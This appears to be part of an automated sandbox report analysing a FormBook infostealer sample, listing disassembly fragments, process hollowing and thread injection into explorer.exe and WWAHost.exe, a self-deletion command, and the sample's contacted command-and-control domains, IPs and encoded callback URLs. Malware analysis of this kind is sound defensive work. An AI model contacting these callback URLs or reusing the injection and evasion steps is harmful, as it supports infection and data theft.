          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038890AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_039014FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03914015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03914015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0391740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0391740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0391740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03860050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03860050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03902073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03911074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00409B30 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.kxdrstone.com
          Source: C:\Windows\explorer.exeDomain query: www.financecreditpro.com
          Source: C:\Windows\explorer.exeDomain query: www.2377k.com
          Source: C:\Windows\explorer.exeDomain query: www.portale-accessi-anomali.com
          Source: C:\Windows\explorer.exeNetwork Connect: 5.9.90.226 80
          Source: C:\Windows\explorer.exeDomain query: www.nurhalilah.xyz
          Source: C:\Windows\explorer.exeDomain query: www.uscryptomininglaws.com
          Source: C:\Windows\explorer.exeDomain query: www.healthcaresms.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.11.163 80
          Source: C:\Windows\explorer.exeDomain query: www.drive16pay.art
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exeDomain query: www.lottochain.bet
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.148.98 80
          Source: C:\Windows\explorer.exeDomain query: www.smpldebts.com
          Source: C:\Windows\explorer.exeNetwork Connect: 202.165.66.108 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\DN_467842234567.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 10D0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\DN_467842234567.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DN_467842234567.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DN_467842234567.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\DN_467842234567.exeMemory written: C:\Users\user\Desktop\DN_467842234567.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\DN_467842234567.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\DN_467842234567.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\DN_467842234567.exeProcess created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: explorer.exe, 00000004.00000000.677442024.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion2OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information4NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing12LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491743 Sample: DN_467842234567.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 31 www.byemreperde.com 2->31 33 www.21lawsofconfidence.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 6 other signatures 2->47 11 DN_467842234567.exe 17 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\rcgwzvp.dll, PE32 11->29 dropped 61 Detected unpacking (changes PE section rights) 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Injects a PE file into a foreign processes 11->65 15 DN_467842234567.exe 11->15         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Sample uses process hollowing technique 15->71 73 Queues an APC in another process (thread injection) 15->73 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.drive16pay.art 202.165.66.108, 49863, 80 VPIS-APVADSManagedBusinessInternetServiceProviderMY Australia 18->35 37 www.financecreditpro.com 5.9.90.226, 49839, 80 HETZNER-ASDE Germany 18->37 39 13 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 51 Performs DNS queries to domains with low reputation 18->51 22 WWAHost.exe 18->22         started        signatures11 process12 signatures13 53 Self deletion via cmd delete 22->53 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DN_467842234567.exe64%ReversingLabsWin32.Trojan.Swotter
          DN_467842234567.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll11%ReversingLabsWin32.Trojan.InjectorX

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.1.DN_467842234567.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.DN_467842234567.exe.e920000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.DN_467842234567.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          7.2.WWAHost.exe.3d57968.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.DN_467842234567.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.0.DN_467842234567.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.DN_467842234567.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.WWAHost.exe.a398b0.0.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.drive16pay.art/r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL000%Avira URL Cloudsafe
          http://www.2377k.com/r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL000%Avira URL Cloudsafe
          http://www.lottochain.bet/r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL000%Avira URL Cloudsafe
          www.bofight.store/r95e/0%Avira URL Cloudsafe
          http://www.nurhalilah.xyz/r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL000%Avira URL Cloudsafe
          http://www.financecreditpro.com/r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL000%Avira URL Cloudsafe
          http://www.uscryptomininglaws.com/r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL000%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.drive16pay.art
          		202.165.66.108
          		truetrue
            		unknown
            uscryptomininglaws.com
            		34.102.136.180
            		truefalse
              		unknown
              www.financecreditpro.com
              		5.9.90.226
              		truetrue
                		unknown
                www.2377k.com
                		172.67.148.98
                		truetrue
                  		unknown
                  td-balancer-euw2-6-109.wixdns.net
                  		35.246.6.109
                  		truefalse
                    		unknown
                    www.nurhalilah.xyz
                    		104.21.11.163
                    		truetrue
                      		unknown
                      www.healthcaresms.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.kxdrstone.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.21lawsofconfidence.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.lottochain.bet
                            		unknown
                            		unknowntrue
                              		unknown
                              www.byemreperde.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.portale-accessi-anomali.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.uscryptomininglaws.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.smpldebts.com
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.drive16pay.art/r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.2377k.com/r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.lottochain.bet/r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      www.bofight.store/r95e/true
                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.nurhalilah.xyz/r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.financecreditpro.com/r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.uscryptomininglaws.com/r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00false
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://nsis.sf.net/NSIS_ErrorDN_467842234567.exefalse
                                        		high
                                        http://nsis.sf.net/NSIS_ErrorErrorDN_467842234567.exefalse
                                          		high

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          104.21.11.163
                                          		www.nurhalilah.xyzUnited States
                                          		13335CLOUDFLARENETUStrue
                                          35.246.6.109
                                          		td-balancer-euw2-6-109.wixdns.netUnited States
                                          		15169GOOGLEUSfalse
                                          34.102.136.180
                                          		uscryptomininglaws.comUnited States
                                          		15169GOOGLEUSfalse
                                          172.67.148.98
                                          		www.2377k.comUnited States
                                          		13335CLOUDFLARENETUStrue
                                          5.9.90.226
                                          		www.financecreditpro.comGermany
                                          		24940HETZNER-ASDEtrue
                                          202.165.66.108
                                          		www.drive16pay.artAustralia
                                          		18206VPIS-APVADSManagedBusinessInternetServiceProviderMYtrue

                                          General Information

                                          Joe Sandbox Version:33.0.0 White Diamond
                                          Analysis ID:491743
                                          Start date:27.09.2021
                                          Start time:21:04:20
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 21s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:DN_467842234567.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:18
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/2@13/6
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 23.1% (good quality ratio 20.5%)
                                          • Quality average: 73.9%
                                          • Quality standard deviation: 32.9%
                                          HCA Information:
                                          • Successful, ratio: 83%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 20.82.209.183, 2.20.157.220, 20.50.102.62, 209.197.3.8, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43
                                          • Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/491743/sample/DN_467842234567.exe

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs

                                          No context

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          www.nurhalilah.xyzDN-32T56U8I90.exeGet hashmaliciousBrowse
                                          • 172.67.166.108

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          CLOUDFLARENETUSD.I. Pipes Fittings.docGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          2mdb3OG6FM.exeGet hashmaliciousBrowse
                                          • 104.23.98.190
                                          DHL AWB# 4AB19037XXX.pdf.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          fTset285bI.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          aQKifdER74.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
